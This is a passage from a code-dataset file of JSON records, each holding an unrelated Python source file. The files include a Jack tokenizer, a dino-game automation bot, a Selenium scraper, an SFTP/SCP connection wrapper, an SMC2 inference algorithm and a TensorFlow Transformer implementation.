scores\n\n\ndef get_score(conn, uid):\n \"\"\"\n Grab user score\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :return: list with user data from leaderboard table\n \"\"\"\n c = conn.cursor()\n c.execute(\"SELECT * FROM leaderboard ORDER BY score DESC\")\n rows = c.fetchall()\n for place, (id, name, score) in enumerate(rows, 1):\n if id == int(uid):\n return [id, {'place': place, 'name': name, 'score': score}]\n return [uid, {'place': 0, 'name': 'Unknown', 'score': 0}]\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"404856702","text":"# coding:utf-8\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n dstDF = pd.read_csv(\"/home/qiu/Documents/data/DP-DATA/deviation/\"\n \"chinaCoast_ddp_200m_deviation.csv\")\n dstDF = dstDF[dstDF[\"dst2\"] != 0]\n dstDF[\"deviation\"] = ((dstDF[\"dst2\"] - dstDF[\"dst1\"]) / dstDF[\"dst2\"]) * 100\n # tmpDF = dstDF[(dstDF[\"deviation\"] > 13) & (dstDF[\"dst2\"] > 10.)]\n # print(tmpDF)\n print(\"mean deviation = %f\" % (1 - (sum(dstDF[\"dst1\"]) / sum(dstDF[\"dst2\"]))))\n","sub_path":"dp/check_deviation.py","file_name":"check_deviation.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"449654956","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 12 20:52:38 2021\n\n@author: velve\n\"\"\"\nfrom constants import symbols\nfrom constants import keywords\nfrom constants import lexical_elements\nimport itertools\nimport collections\nimport re\nclass JackTokenizer:\n #constructor\n def __init__(self,input_file):\n file = open(input_file, 'r')\n self.input = file.read()\n file.close()\n self.tokens = collections.deque()\n self.current_token = None\n self.next_token = None\n self.current_token_type = None\n self.process_input()\n self.has_more_tokens = True\n def advance(self):\n if self.current_token == None:\n self.current_token = self.tokens.popleft()\n else:\n self.current_token = self.next_token\n if len(self.tokens) > 0:\n self.next_token = self.tokens.popleft()\n else:\n self.has_more_tokens = False\n self.current_token_type = self.token_type(self.current_token)\n print(self.current_token)\n print(self.current_token_type)\n def process_input(self):\n self.input = self.remove_white_space_and_comments()\n self.split(self.input)\n def split(self,string):\n temp = re.findall(lexical_elements,self.input)\n match = list(itertools.chain(*temp))\n for m in match:\n if m:\n self.tokens.append(m)\n \n def remove_white_space_and_comments(self):\n inline_comment = re.compile('//.*\\n')\n multiline_comment = re.compile(\"/\\*.*?\\*/\", flags=re.S)\n remove_multiline = re.sub(multiline_comment, ' ', self.input)\n remove_inline = re.sub(inline_comment, '\\n', remove_multiline)\n return remove_inline\n \n def token_type(self, token):\n if token in symbols:\n return \"SYMBOL\"\n elif token.isnumeric():\n return \"INTEGER_CONSTANT\"\n elif token in keywords:\n return \"KEYWORD\"\n elif token.isalnum():\n return \"IDENTIFIER\"\n else:\n return \"STRING_CONSTANT\"\n def keyword(self):\n return self.current_token\n def symbol(self):\n return self.current_token\n def identifier(self):\n return self.current_token\n def int_val(self):\n return int(self.current_token)\n def string_val(self):\n temp = self.current_token.replace(\"\\\"\", '')\n return temp\n def get_token_type(self):\n if self.current_token_type == None:\n return -1\n return self.current_token_type.lower()\n \nif __name__ == \"__main__\":\n t = JackTokenizer(\"Main.jack\")\n f = open(\"Main.xml\",\"w\")\n f.write(\"\\n\")\n t.advance()\n while(t.has_more_tokens):\n f.write(\"<{}>{}{}>\\n\".format(t.get_token_type(), t.current_token,t.get_token_type()))\n t.advance()\n f.write(\" \\n\")\n f.close()","sub_path":"nand2tetris/projects/11/JackTokenizer.py","file_name":"JackTokenizer.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"60399232","text":"import pyautogui\nimport time\nfrom PIL import ImageGrab, ImageOps\nfrom numpy import *\n\n\nclass Cord():\n replaybtn = (480, 573)\n dino = (221,580)\n#x=280\n#y=625\n\n\ndef gamerestart():\n pyautogui.click(Cord.replaybtn)\n print(\"RESTARTED GAME\")\n\n\ndef pressspace():\n pyautogui.keyDown('space')\n time.sleep(0.05)\n print(\">>>JUMP<<<\")\n pyautogui.keyUp('space')\n\n\ndef pressdown():\n pyautogui.keyDown('down')\n time.sleep(0.05)\n print(\"DUCK\")\n pyautogui.keyUp('down')\n\n\ndef imggrab():\n # box=(277, 580, 368, 625)\n box = (300, 580, 400, 625)\n image = ImageGrab.grab(box)\n grayimage = ImageOps.grayscale(image)\n imgarray = array(grayimage.getcolors())\n return imgarray.sum()\n\n\ndef main():\n gamerestart()\n while True:\n #4342\n if imggrab() != 4747:\n pressspace()\n time.sleep(0.1)\n else:\n print(\"\\n\")\n time.sleep(0.1)\n\n\nmain()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"324847469","text":"def nearest_larger(arr, i):\n if max(arr) == arr[i]:\n return None\n nearestIdx = 0\n for index in range(len(arr)):\n #In last expression, after \"or\", \"nearestIdx== 0\" is needed, because interpreter should understand \n #whether it is first time to update the \"nearestIdx\" or not\n if arr[index] > arr[i] and i != index and (abs(i - nearestIdx) > abs(i-index) or nearestIdx == 0):\n nearestIdx = index\n return nearestIdx\n","sub_path":"Python/App Academy Exercise/practice-problems2/my solutions in python/00_nearest_larger_spec.py","file_name":"00_nearest_larger_spec.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"60714655","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport random\nfrom bs4 import BeautifulSoup\n\nHeaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nCardsURL = \"https://ads.twitter.com/transparency/%s/tweet/%s\"\n\nclass Cards():\n def __init__(self, screenName, tweetID):\n self.options = Options()\n self.options.add_argument(\"user-agent=%s\"%(Headers['User-Agent']))\n self.options.add_argument('headless')\n self.driver = webdriver.Chrome(options=self.options)\n self.screenName = screenName\n self.tweetID = tweetID\n \n\n def GetCard(self):\n URL = CardsURL % (self.screenName, self.tweetID)\n print(URL)\n self.driver.get(URL)\n time.sleep(random.randint(3,6))\n for _ in range(5):\n try:\n elem = self.driver.find_element_by_css_selector('a.Card-urlWrapper')\n return elem.text\n except:\n time.sleep(random.randint(5,10))\n return -1","sub_path":"GetCards.py","file_name":"GetCards.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"459670517","text":"from django.apps import apps\nfrom django.test import TestCase\nfrom model_bakery import baker\nfrom rest_framework import serializers\n\nfrom api.serializers.common import MappedSerializerMixin\nfrom api.serializers.registration import UserSerializer\nfrom common.constants import models\n\nProfile = apps.get_model(models.REGISTRATION_PROFILE)\n\n\nclass TestMappedSerializerMixin(TestCase):\n @classmethod\n def setUpTestData(cls):\n class DummyModelSerializer(MappedSerializerMixin, serializers.ModelSerializer):\n serializers_map = {\n 'user': UserSerializer(many=False, read_only=True)\n }\n\n class Meta:\n model = Profile\n fields = ('id', 'user',)\n cls.user = baker.make_recipe('registration.user')\n cls.profile = cls.user.profile\n cls.model_serializer = DummyModelSerializer\n\n def test_normal_serialization_ok(self):\n data = self.model_serializer(instance=self.profile, many=False).data\n\n self.assertEqual(data['id'], self.profile.id)\n self.assertEqual(data['user'], self.user.pk)\n\n def test_mapped_serialization_ok(self):\n data = self.model_serializer(instance=self.profile, many=False, map_fields=['user']).data\n\n self.assertEqual(data['id'], self.profile.id)\n self.assertEqual(data['user']['id'], self.user.id)\n self.assertEqual(data['user']['username'], self.user.username)\n","sub_path":"tests/api/serializers/test_common_serializer.py","file_name":"test_common_serializer.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643419824","text":"from getpass import getpass\nfrom pathlib import Path\nfrom typing import Union\n\nimport fabric\nfrom paramiko import SSHClient\nfrom scp import SCPClient\n\n__all__ = [\"Connection\"]\n\n\nclass Connection:\n def __init__(\n self,\n username: Union[str, Path] = None,\n host: Union[str, Path] = None,\n protocol: str = \"sftp\",\n *args,\n **kwargs\n ):\n self.user = username or input(\"Enter username: \")\n self.host = host or input(\"Enter host URL: \")\n self._args = list(*args)\n self._kwargs = {**kwargs}\n self.__c = None\n\n if protocol.lower() in [\"sftp\", \"scp\"]:\n self.protocol = protocol.lower()\n else:\n raise ValueError('Protocol must be \"sftp\" or \"scp\".')\n\n def update(self, **kwargs):\n self._kwargs = kwargs\n\n def __call__(self, **kwargs):\n self.update(**kwargs)\n return self\n\n def __str__(self):\n return \"Connection to {} as {}\".format(self.host, self.user)\n\n def __repr__(self):\n return \"<{}.{} object at {}>\".format(\n self.__class__.__module__, self.__class__.__name__, hex(id(self))\n )\n\n def connect(self, **kwargs):\n try:\n keywords = (\n dict(**kwargs)\n or dict(**self._kwargs)\n or dict(password=getpass(\"Enter password: \"))\n )\n if self.protocol == \"sftp\":\n c = fabric.Connection(\n host=self.host, user=self.user, connect_kwargs=keywords\n )\n self.__c = c\n else:\n c = SSHClient()\n c.connect(\n self.host,\n username=self.user,\n password=self._kwargs[\"password\"] or getpass(\"Enter password: \"),\n )\n self.__c = SCPClient(c.get_transport())\n\n return self.__c\n except Exception as e:\n raise e\n\n def __enter__(self, **kwargs):\n return self.connect()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.__c.close()\n","sub_path":"miranda/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"219234396","text":"from .base import SequentialParticleAlgorithm\nfrom .kernels import ParticleMetropolisHastings, SymmetricMH, AdaptiveRandomWalk\nfrom ..utils import get_ess\nfrom ..filters import ParticleFilter\nfrom ..module import TensorContainer\nfrom torch import isfinite\n\n\nclass SMC2(SequentialParticleAlgorithm):\n def __init__(self, filter_, particles, threshold=0.2, kernel: ParticleMetropolisHastings = None, max_increases=5):\n \"\"\"\n Implements the SMC2 algorithm by Chopin et al.\n :param threshold: The threshold at which to perform MCMC rejuvenation\n :param kernel: The kernel to use when updating the parameters\n \"\"\"\n\n super().__init__(filter_, particles)\n\n # ===== When and how to update ===== #\n self._threshold = threshold * particles\n self._kernel = kernel or SymmetricMH()\n\n if not isinstance(self._kernel, ParticleMetropolisHastings):\n raise ValueError(f'The kernel must be of instance {ParticleMetropolisHastings.__class__.__name__}!')\n\n # ===== Some helpers to figure out whether to raise ===== #\n self._max_increases = max_increases\n self._increases = 0\n\n # ===== Save data ===== #\n self._y = TensorContainer()\n\n def _update(self, y):\n # ===== Save data ===== #\n self._y.append(y)\n\n # ===== Perform a filtering move ===== #\n _, ll = self.filter.filter(y)\n self._w_rec += ll\n\n # ===== Calculate efficient number of samples ===== #\n ess = get_ess(self._w_rec)\n self._logged_ess.append(ess)\n\n # ===== Rejuvenate if there are too few samples ===== #\n if ess < self._threshold or (~isfinite(self._w_rec)).any():\n self.rejuvenate()\n self._w_rec[:] = 0.\n\n return self\n\n def rejuvenate(self):\n \"\"\"\n Rejuvenates the particles using a PMCMC move.\n :return: Self\n \"\"\"\n\n # ===== Update the description ===== #\n self._kernel.set_data(self._y.tensors)\n self._kernel.update(self.filter.ssm.theta_dists, self.filter, self._w_rec)\n\n # ===== Increase states if less than 20% are accepted ===== #\n if self._kernel.accepted < 0.2 and isinstance(self.filter, ParticleFilter):\n self._increase_states()\n\n return self\n\n def _increase_states(self):\n \"\"\"\n Increases the number of states.\n :return: Self\n \"\"\"\n\n if self._increases >= self._max_increases:\n raise Exception(f'Configuration only allows {self._max_increases}!')\n\n # ===== Create new filter with double the state particles ===== #\n oldlogl = self.filter.result.loglikelihood\n\n self.filter.reset()\n self.filter.particles = 2 * self.filter.particles[1]\n self.filter.set_nparallel(self._w_rec.shape[0]).initialize().longfilter(self._y.tensors, bar=False)\n\n # ===== Calculate new weights and replace filter ===== #\n self._w_rec = self.filter.result.loglikelihood - oldlogl\n self._increases += 1\n\n return self\n","sub_path":"pyfilter/inference/smc2.py","file_name":"smc2.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260292017","text":"import sys\nimport argparse\nimport os\n\ntry:\n import zdcode\n import zdcode.zake as zake\n from zdcode.bundle import Bundle\n\nexcept ImportError:\n import __init__ as zdcode\n import zake\n from bundle import Bundle\n\ndef print_parse_error(e):\n print('{}: {}'.format(type(e).__name__, str(e)))\n sys.exit(2)\n\ndef from_stdin():\n data = []\n\n for line in iter(sys.stdin.readline, \"\"):\n data.append(line)\n\n if not data:\n print(\"No data to use! Provide as stdin or as arguments.\")\n sys.exit(1)\n\n print(zdcode.ZDCode.parse(\"\\n\".join(data), error_handler=print_parse_error).decorate())\n\nclass TupleTrue(argparse.Action):\n def __init__(self, option_strings, dest, nargs=None, **kwargs):\n if nargs != 1:\n raise ValueError(\"Invalid nargs for TupleTrue action (only 1 available)\")\n\n super(TupleTrue, self).__init__(option_strings, dest, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string=None):\n l = getattr(namespace, self.dest, None) or []\n\n if not l:\n setattr(namespace, self.dest, l)\n\n l.append((values, True))\n\ndef arg_parser():\n aparser = argparse.ArgumentParser(description='ZDCode compilation and bundling engine.')\n\n aparser.add_argument('input', type=str, metavar='INFILES', nargs='+', help='input files for the compiler (zc2)')\n aparser.add_argument('-od', '--output-decorate', type=argparse.FileType('w'), required=False, metavar='OUTFILE', dest='out_compile', default=None, help='output plain text file from with compiled DECORATE')\n aparser.add_argument('-oa', '--output-pk3-asset', type=argparse.FileType('wb'), required=False, metavar='OUTFILE', dest='out_asset', default=None, help='output file with assets bundled in a pk3')\n aparser.add_argument('-oc', '--output-pk3-code', type=argparse.FileType('wb'), required=False, metavar='OUTFILE', dest='out_code', default=None, help='output file with compiled DECORATE bundled in a pk3')\n aparser.add_argument('-D', '--define', type=str, nargs=1, metavar='DEFNAMES', dest='prepdefs', action=TupleTrue, required=False, help='preprocessor definitions (set to True)')\n aparser.add_argument('-S', '--set', type=str, nargs=2, metavar=('DEFNAME', 'DEFVALS'), dest='prepdefs', action='append', required=False, help='preprocessor definitions (set to a string value)')\n aparser.set_defaults(func=do_bundle)\n\n return aparser\n\ndef main():\n if len(sys.argv) > 1:\n args = arg_parser().parse_args()\n return args.func(args)\n\n return zake.main(print_status_code=False)\n\n# Actions\n\ndef do_compile(args, preproc_defs=()):\n code = zdcode.ZDCode()\n\n for fn in args.input:\n with open(fn) as fp:\n if not code.add(fp.read(), os.path.basename(fn), os.path.dirname(fn), preproc_defs=preproc_defs, error_handler=print_parse_error):\n return 1\n\n dec = code.decorate()\n open(args.out_compile, \"w\").write(dec)\n print(\"Output compiled successfully.\")\n\ndef do_bundle(args, preproc_defs=()):\n bundle = Bundle(*args.input, error_handler=print_parse_error)\n\n status, msg = bundle.bundle(args.out_asset, args.out_code, args.out_compile, preproc_defs={k.upper(): v for (k, v) in getattr(args, 'prepdefs', []) or []})\n print(msg)\n\n return status\n","sub_path":"zdcode/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"500046174","text":"\ndef write(data_number, data_degree, data_diff, array_strings):\n # Formatting for beautiful name\n data_diff = 'int' if data_diff is 1 else 'float'\n data_degree = str(data_degree[0]) + '-' + str(data_degree[1])\n file_name = 'exported/'+str(data_number)+'_'+data_degree+'_'+data_diff+'.txt'\n\n # Open file\n file = open(file_name, 'w')\n # Write result to file\n file.write('\\n\\n')\n for i in array_strings:\n file.write(i)\n file.write('\\n\\n')\n # Close file\n file.close()\n print('Output was exported. Path: ' + file_name)\n\n\n# Just format result for writing to file\ndef format_to_file(number, array_degrees, result):\n i = 0\n array_lines = []\n\n while i < len(result):\n line = str(number) + '^' + str(array_degrees[i]) + ' = ' + str(result[i]) + '\\n'\n array_lines.append(line)\n i += 1\n return array_lines\n","sub_path":"involute/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"271982958","text":"import tensorflow as tf\nimport numpy as np\n\n\n# Positional encoding\n\ndef get_angles(pos,i,d_model):\n return pos / np.power(10000,(2*(i//2))/np.float32(d_model))\n\n\ndef positional_encoding(pos,d_model):\n angle_rads = get_angles(np.arange(pos)[:,np.newaxis],np.arange(d_model)[np.newaxis,:],d_model)\n angle_rads[:,0::2] = np.sin(angle_rads[:,0::2])\n angle_rads[:,1::2] = np.cos(angle_rads[:,1::2])\n pos_encoding = angle_rads[np.newaxis,...]\n return tf.cast(pos_encoding,dtype = tf.float32)\n\n\n# Mask operation\ndef create_pad_mask(seq):\n seq = tf.cast(tf.math.equal(seq,0),tf.float32)\n return seq[:,tf.newaxis,tf.newaxis,:] # (batch_size,1,1,seq_len)\n\ndef create_look_ahead_mask(size):\n mask = 1-tf.linalg.band_part(tf.ones((size,size)),-1,0)\n return mask\n\n\n# Multi_head attention\n\ndef scaled_dot_product_attention(q,k,v,mask):\n matmul_qk= tf.matmul(q,k,transpose_b=True)\n dk = tf.cast(tf.shape(k)[-1],tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n\n if mask is not None:\n mask=tf.cast(mask,tf.float32)\n scaled_attention_logits += (mask * -1e9)\n\n attention_weights = tf.nn.softmax(scaled_attention_logits,axis = -1)\n output = tf.matmul(attention_weights,v)\n return output,attention_weights\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads):\n super(MultiHeadAttention,self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(d_model)\n self.wk = tf.keras.layers.Dense(d_model)\n self.wv = tf.keras.layers.Dense(d_model)\n\n self.dense = tf.keras.layers.Dense(d_model)\n\n def split_heads(self,x,batch_size):\n x = tf.reshape(x,(batch_size,-1,self.num_heads,self.depth))\n return tf.transpose(x,perm =[0,2,1,3]) # (batch_size,num_heads,seq_len,depth)\n\n def call(self,q,k,v,mask):\n batch_size = tf.shape(q)[0]\n\n q = self.wq(q) # (batch_size,seq_len,d_model)\n k = self.wk(k) # (batch_size,seq_len,d_model)\n v = self.wv(v) # (batch_size,seq_len,d_model)\n\n q = self.split_heads(q,batch_size) # (batch_size,num_heads,seq_len_q,depth)\n k = self.split_heads(k,batch_size) # (batch_size,num_heads,seq_len_k,depth)\n v = self.split_heads(v,batch_size) # (batch_size,num_heads,seq_len_v,depth)\n\n scaled_attention,attention_weights = scaled_dot_product_attention(q,k,v,mask)\n # scaled_attention.shape == (batch_size,num_heads,seq_len_q,depth)\n # attention_weights.shape == (batch_size,num_heads,seq_len_q,seq_len_k)\n\n scaled_attention = tf.transpose(scaled_attention,perm = [0,2,1,3]) # (batch_size,seq_len_q,num_heads,depth)\n concat_attention = tf.reshape(scaled_attention,(batch_size,-1,self.d_model)) # (batch_size,seq_len_q,d_model)\n output = self.dense(concat_attention)\n return output, attention_weights\n\n\n# Point wise feed forward network\n\ndef point_wise_feed_forward_network(d_model,dff):\n return tf.keras.Sequential([tf.keras.layers.Dense(dff,activation = 'relu'),tf.keras.layers.Dense(d_model)])\n\n\nclass LayerNorm(tf.keras.layers.Layer):\n def __init__(self,epsilon=1e-6,scale=True,center=True):\n super(LayerNorm,self).__init__()\n self.epsilon=epsilon\n self.scale=scale\n self.center=center\n self.beta_initializer=tf.keras.initializers.get('zeros')\n self.gamma_initializer=tf.keras.initializers.get('ones')\n self.beta_regularizer=tf.keras.regularizers.get(None)\n self.gamma_regularizer=tf.keras.regularizers.get(None)\n self.beta_constraint=tf.keras.constraints.get(None)\n 
self.gamma_constraint=tf.keras.constraints.get(None)\n\n def build(self,input_shape):\n if self.scale:\n self.gamma=self.add_weight(name='gamma',shape=input_shape[-1],initializer=self.gamma_initializer,\n regularizer=self.gamma_initializer,constraint=self.gamma_constraint,trainable=True)\n else:\n self.gamma=None\n if self.center:\n self.beta=self.add_weight(name='beta',shape=input_shape[-1],initializer=self.beta_initializer,\n regularizer=self.beta_regularizer,constraint=self.beta_constraint,trainable=True)\n else:\n self.beta=None\n\n def call(self,inputs):\n input_shape=inputs.shape\n mean,variance=tf.nn.moments(x=inputs,axes=[-1],keepdims=True)\n return self.gamma * (inputs-mean)/(variance+self.epsilon) + self.beta\n\n\n\n# Encoder layer\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads,dff,rate = 0.1):\n super(EncoderLayer,self).__init__()\n\n self.mha = MultiHeadAttention(d_model,num_heads)\n self.ffn = point_wise_feed_forward_network(d_model,dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon = 1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.layernorm=LayerNorm(epsilon=1e-6,scale=True,center=True)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self,x,mask,training):\n attn_output,_ = self.mha(x,x,x,mask)\n attn_output = self.dropout1(attn_output,training=training)\n #out1=self.layernorm(x+attn_output)\n\n out1 = self.layernorm1(x+attn_output)\n\n\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output,training = training)\n out2 = self.layernorm2(out1 + ffn_output)\n\n return out2\n\nclass DecoderLayer(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads,dff,rate=0.1):\n super(DecoderLayer,self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads)\n self.mha2 = MultiHeadAttention(d_model, num_heads)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self,x,enc_output,look_ahead_mask,padding_mask,training):\n attn1,attn_weights_block1 = self.mha1(x,x,x,look_ahead_mask)\n attn1 = self.dropout1(attn1,training=training)\n out1 = self.layernorm1(attn1+x)\n\n attn2,attn_weights_block2 = self.mha2(out1,enc_output,enc_output,padding_mask)\n attn2 = self.dropout2(attn2,training = training)\n out2 = self.layernorm2(attn2 + out1)\n\n ffn_output = self.ffn(out2)\n ffn_output = self.dropout3(ffn_output,training=training)\n out3 = self.layernorm3(ffn_output +out2)\n\n return out3,attn_weights_block1,attn_weights_block2\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self,num_layers,d_model,num_heads,dff,input_vocab_size,maximum_position_encoding,embedding_matrix,rate = 0.1,use_trained_embedding=False):\n super(Encoder,self).__init__()\n self.d_model = d_model\n self.num_alyers = num_layers\n self.use_trained_embedding=use_trained_embedding\n if use_trained_embedding:\n self.embedding = tf.keras.layers.Embedding(embedding_matrix.shape[0], self.d_model,\n weights=[embedding_matrix], trainable=False)\n else:\n self.embedding = tf.keras.layers.Embedding(input_vocab_size,d_model)\n\n self.pos_encoding = 
positional_encoding(maximum_position_encoding,self.d_model)\n self.enc_layers = [EncoderLayer(d_model,num_heads,dff,rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self,x,mask,training):\n seq_len = tf.shape(x)[1]\n\n if self.use_trained_embedding:\n x = self.embedding(x)\n else:\n x = self.embedding(x)\n x *=tf.math.sqrt(tf.cast(self.d_model,tf.float32))\n x+=self.pos_encoding[:,:seq_len,:]\n x=self.dropout(x,training=training)\n\n for i in range(self.num_alyers):\n x = self.enc_layers[i](x,mask,training)\n return x\n\nclass Decoder(tf.keras.layers.Layer):\n def __init__(self,num_layers,d_model,num_heads,dff,target_vocab_size,maximum_position_encoding,embedding_matrix,rate = 0.1,use_trained_embedding=False):\n super(Decoder,self).__init__()\n self.d_model = d_model\n self.num_alyers = num_layers\n self.use_trained_embedding = use_trained_embedding\n if use_trained_embedding:\n self.embedding = tf.keras.layers.Embedding(embedding_matrix.shape[0], self.d_model,\n weights=[embedding_matrix], trainable=False)\n else:\n self.embedding = tf.keras.layers.Embedding(target_vocab_size,d_model)\n\n self.dec_layers = [DecoderLayer(d_model,num_heads,dff,rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self,x,enc_output,look_ahead_mask,padding_mask,training):\n seq_len = tf.shape(x)[1]\n attention_weights ={}\n if self.use_trained_embedding:\n x = self.embedding(x)\n else:\n x = self.embedding(x)\n x *=tf.math.sqrt(tf.cast(self.d_model,tf.float32))\n x+=positional_encoding(seq_len,self.d_model)\n x=self.dropout(x,training=training)\n\n for i in range(self.num_alyers):\n x,block1,block2 = self.dec_layers[i](x,enc_output,look_ahead_mask,padding_mask,training)\n attention_weights['decoder_layer{}_block1'.format(i+1)]=block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return x,attention_weights\n\n\n\nclass Transformer(tf.keras.Model):\n def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size,target_vocab_size, max_enc_len, max_dec_len, embedding_matrix,rate=0.1):\n super(Transformer, self).__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, dff,\n input_vocab_size, max_enc_len, embedding_matrix,rate,use_trained_embedding=False)\n\n\n self.decoder = Decoder(num_layers, d_model, num_heads, dff,\n target_vocab_size, max_dec_len,embedding_matrix, rate,use_trained_embedding=False)\n\n self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n\n def call(self, inp, tar, enc_padding_mask,\n look_ahead_mask, dec_padding_mask,training):\n enc_output = self.encoder(inp, enc_padding_mask,training) # (batch_size, inp_seq_len, d_model)\n\n\n # dec_output.shape == (batch_size, tar_seq_len, d_model)\n dec_output, attention_weights = self.decoder(\n tar, enc_output, look_ahead_mask, dec_padding_mask,training)\n\n final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)\n\n return final_output, attention_weights\n\n\ndef create_masks(inp, tar):\n enc_padding_mask = create_pad_mask(inp)\n dec_padding_mask = create_pad_mask(inp)\n\n look_ahead_mask = create_look_ahead_mask(tf.shape(tar)[1].numpy())\n dec_target_padding_mask = create_pad_mask(tar)\n combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)\n\n return enc_padding_mask, combined_mask, dec_padding_mask\n\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self,d_model,warmup_steps):\n super(CustomSchedule,self).__init__()\n 
self.d_model=tf.cast(d_model,tf.float32)\n self.warmup_steps=warmup_steps\n\n def __call__(self,step):\n arg1=tf.math.rsqrt(step)\n arg2=step*(self.warmup_steps**-1.5)\n return tf.math.rsqrt(self.d_model)*tf.math.minimum(arg1,arg2)\n\n","sub_path":"model_layers/Transformer_model.py","file_name":"Transformer_model.py","file_ext":"py","file_size_in_byte":12007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"126298296","text":"#!/usr/bin/env python\n__all__ = [\n \"user\",\n \"owner\",\n \"tab\",\n \"repos\",\n \"orgs\",\n \"examples\",\n \"apps\",\n \"cli\",\n \"style\",\n \"tests\"]\nimport os\nimport plistlib\n\ndef read(path,default=None):\n if os.path.exists(path):\n return open(path).read().rstrip()\n return default\n\ntab = \"index\"\nHOME=os.environ[\"HOME\"]\nservices=os.path.join(HOME,\".services\")\ngithub=os.path.join(HOME,\".services\",\"github.com\")\n\nsearchpath = []\ncwd = os.getcwd()\nrepo = os.path.basename(cwd)\nuser=\"russianidiot\"\nowner = os.path.basename(cwd).split(\".\")[0]\n\ndef webloc_url(path):\n try:\n plist = plistlib.readPlist(path)\n url = plist.URL # UPPERCASE\n return url\n except Exception as e:\n print(\"%s: %s\" % (type(e),str(e)))\n\nclass Service(object):\n path = None\n\n def __init__(self,path):\n self.path = path\n\n @property\n def domain(self):\n return os.path.basename(self.path)\n\n def join(self,*path):\n path = os.path.join(self.path,*path)\n return path\n\n @property\n def exists(self):\n path = self.join(\"exists\")\n return os.path.exists(path)\n\n @property\n def urls(self):\n path = self.join(\"WEBLOC\")\n if not os.path.exists(path):\n return dict()\n urls = dict()\n listdir=os.listdir(path)\n for l in listdir:\n fullpath=os.path.join(path,l)\n url = webloc_url(fullpath)\n name = l.replace(\".webloc\",\"\")\n urls[name] = url\n return urls\n\n def __getattr__(self, attr):\n path = self.join(attr)\n if not os.path.exists(path):\n return\n return open(path).read().rstrip()\n\n def __str__(self):\n return self.path\n\n\nclass Repo(object):\n owner = None\n repo = None\n fullname = None\n\n def __init__(self, owner,repo):\n self.owner = owner\n self.repo = repo\n self.fullname=\"%s/%s\" % (self.owner,self.repo)\n\n @property\n def ext(self):\n return self.repo.split(\".\")[-1:][0]\n\n @property\n 